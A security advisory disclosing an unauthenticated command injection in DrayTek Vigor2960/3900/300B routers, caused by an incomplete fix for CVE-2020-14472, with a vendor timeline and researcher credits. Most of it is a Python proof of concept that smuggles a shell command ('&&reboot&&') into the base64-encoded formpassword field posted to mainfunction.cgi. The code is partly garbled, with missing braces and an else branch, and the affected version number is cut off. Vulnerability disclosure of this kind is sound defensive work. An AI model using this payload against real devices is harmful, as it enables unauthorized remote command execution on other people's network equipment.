An command injection vulnerability without authorization was found by us in DrayTek Vigor2960/Vigor3900/Vigor300B(version <=

The vulnerability allows any unauthorized attacker to execute commands remotely if the sms-auth is enabled.

Cause of Vulnerability

The vulnerability is caused by the unsafe and incomplete patch for CVE-2020-14472(command injection @ authuser action) , which failed to escape some dangerous characters in formpassword.

Proof of Vulnerability

Communication with DrayTek Corp.

  • 2021/02/01, the vulnerability wad reported to DrayTek Technical Support.
  • 2021/02/05, DrayTek Technical Support fixed the vulnerability and built a beta firmware.


from sys import argv
from base64 import b64encode
import requests

data = {
    "URL": "",
    "HOST": "",
    "action": "authuser",
    "formusername": b64encode(b"admin").decode(),
    "formpassword": b64encode(b"admin'&&reboot&&echo '").decode(),
    "PHONENUMBER": argv[1]
header = {
    "Content-Type": "application/raw"
url = {
    "root": "",
    "cgi": {
        "root": "/cgi-bin",
        "uri": {
            "mf": "/mainfunction.cgi",

def build_url(p1, p2=None):
    if p2:
        return url["root"] + url[p1]["root"] + url[p1]["uri"][p2]
        return url["root"] + url[p1]

session = requests.session()
session.post(build_url("cgi", "mf"), data=data, headers=header)


C0ss4ck @ ByteDance WuHengLab

H4lo @ DbappSecurity Hatlab

git link: https://gist.github.com/Cossack9989/4fc889b05fa23478ef6ce8ff67200085